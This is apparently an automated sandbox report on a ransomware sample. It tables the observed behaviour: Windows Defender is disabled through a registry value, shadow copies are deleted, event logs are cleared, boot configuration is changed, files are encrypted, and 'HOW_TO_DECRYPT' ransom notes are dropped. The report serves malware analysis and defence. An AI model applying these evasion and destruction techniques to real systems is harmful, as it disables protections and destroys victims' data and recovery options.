Analysis Overview
SHA256
1cba1a291ce919947f88133cd5e57177a1a1585fcb91bc39f61fabccf52ca76a
Threat Level: Known bad
The file c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.7z was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Interacts with shadow copies
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 19:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win7-en-20211208
Max time kernel
182s
Max time network
124s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_IP1QxnAExbA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_nYvWBHUVz2k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_x8wScbWpV0A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_q7mDP58Ue640.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_ppJWokR7gNc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_9znLbMUVkOw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_L0jB_2BzHVE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_CsxtEScqIOc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_OLHdCQs6qlM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_5oAyYdFdhGs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_zcaawo9I91I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_t8ybF_woHpI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dpTWGEB2zlo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_HguxSk5_qJQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_eAoPrwCmf6M0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1NUNv85SfKE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_H9Sw2I-NhPQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\ja-JP\sbdrop.dll.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_aHyk0Cx-EoY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_Rz7rbldeanM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_7VYzzCb49Bc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_r1JsYqjHkfQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_fyyKrIIjZhw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1S0DkVNFyJE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dG0Y2VLVPZU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_gNJm2LdGyeE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1tc5K1JFgj00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_MfOITshG0C40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_4qfVfFrBGDc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_EKm8KedZVac0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_xvsftD7L4eE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_LFS10E66NZI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_RQmmA2AZqb40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1LEJ-ivifeA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_S6nEgIoxBnA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_i6rkMkgC6hE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_POsspnLpQio0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
